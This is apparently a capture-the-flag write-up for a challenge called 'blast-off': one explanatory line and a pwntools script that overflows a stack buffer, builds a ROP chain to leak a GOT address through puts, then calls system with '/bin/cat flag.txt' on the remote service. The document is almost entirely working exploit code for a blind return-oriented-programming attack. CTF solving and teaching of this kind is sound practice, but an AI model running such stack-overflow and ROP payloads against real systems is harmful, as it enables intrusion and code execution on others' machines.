Assumed that `BLAST_OFF` will run `system` at some point because there is `cat flag.txt` in the binary data (leaked a few bytes after the `BLAST_OFF` function)

```py
from pwn import *

p=remote("spaceheroes-blast-off.chals.io", 443, ssl=True, sni="spaceheroes-blast-off.chals.io")

padding = b"A"*40

PUTS_PLT = 0x400690
BLAST_OFF_GOT = 0x602038
# From trial and error (BROP_GADGET + p64(0) + p64(0) + ... + MAIN) found 6 pops -> assume this common gadget
BROP_GADGET = 0x400b4a # pop rbx, pop rbp, pop r12, pop r13, pop r14, pop r15
MAIN = 0x400991

# Helper offsets, more at: https://github.com/nushosilayer8/pwn/blob/master/brop/README.md
RSI_R15 = BROP_GADGET + 0x7
RDI = BROP_GADGET + 0x9

payload = padding + p64(RDI) + p64(BLAST_OFF_GOT) + p64(PUTS_PLT) + p64(MAIN)

p.sendline(payload)

p.recvuntil(b"to start:")
p.recvline()
leak = u64(p.recvline().strip().ljust(8, b"\x00"))

info(f"Leak: {hex(leak)}")

catflag = leak + 443 # /bin/cat flag.txt from leaked data
WIN = leak + 0xdb # system call from leaked code - guessed this one

# Use this a few times to leak BLAST_OFF code and data
# payload2 = padding + p64(RDI) + p64(leak + OFFSET) + p64(PUTS_PLT)

payload2 = padding + p64(RDI) + p64(catflag) + p64(WIN) + p64(MAIN)

p.sendline(payload2)

p.recvuntil(b"to start:")
p.recvline()
flag = p.recvline()

info(f"Flag: {flag}")
```